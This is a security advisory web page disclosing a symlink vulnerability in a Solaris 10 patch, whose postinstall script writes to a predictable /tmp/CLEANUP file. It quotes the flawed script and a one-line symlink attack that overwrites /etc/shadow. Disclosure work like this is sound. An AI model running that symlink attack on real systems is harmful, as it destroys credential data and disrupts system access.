Solaris 10 patch cluster File clobbering vulnerability

2013.06.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

File clobbering vulnerability in Solaris 10 patch cluster 3/27/2013 Larry W. Cashdollar @_larry0 Hello, The 147147-26 patch creates a CLEANUP file in /tmp that is vulnerable to symlink attacks: The contents of the file created in /tmp are: /sbin/sh:root@dev-unix-sec02# cat CLEANUP EXISTING_FILE_PRESERVED: /var/run/.patchSafeMode/root/etc/security/audit_event /var/run/.patchSafeMode/root/etc/security/audit_event.new EXISTING_FILE_RENAMED: /var/run/.patchSafeMode/root/etc/mail/sendmail.cf /var/run/.patchSafeMode/root/etc/mail/sendmail.cf.old EXISTING_FILE_RENAMED: /var/run/.patchSafeMode/root/etc/mail/submit.cf /var/run/.patchSafeMode/root/etc/mail/submit.cf.old Sendmail has been upgraded to version 8.14.5 . After you reboot, you may want to run /usr/sbin/check-hostname and /usr/sbin/check-permissions ALL These two shell-scripts will check for common mis-configurations and recommend corrective action, or report if things are OK. -rw-r--r-- 1 root other 662 Mar 27 13:03 CLEANUP The vulnerable code can be found in ./SUNWsndmu/install/postinstall: 540 CLEANUP=/tmp/CLEANUP 541 542 if [ "x$UPDATE" = xyes ]; then 543 VERSION=`grep '^DZ' $PKG_INSTALL_ROOT/etc/mail/sendmail.cf | \ 544 sed -e s/DZ//` 545 echo "\nSendmail has been upgraded to version $VERSION ." >>$CLE ANUP 546 echo "After you reboot, you may want to run" >>$CLEANUP 547 echo "\t/usr/sbin/check-hostname" >>$CLEANUP 548 echo "and" >>$CLEANUP 549 echo "\t/usr/sbin/check-permissions ALL" >>$CLEANUP 550 echo "These two shell-scripts will check for common" >>$CLEANUP 551 echo "misconfigurations and recommend corrective" >>$CLEANUP 552 echo "action, or report if things are OK.\n" >>$CLEANUP 553 fi A simple attack in /tmp can clobber /etc/shadow: [/tmp $] ln -s /etc/shadow CLEANUP Will over write the contents of /etc/shadow. Oracle has been notified 3/27/2013 and they are working on a fix.

References:

https://cxsecurity.com/issue/WLB-2012080079


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top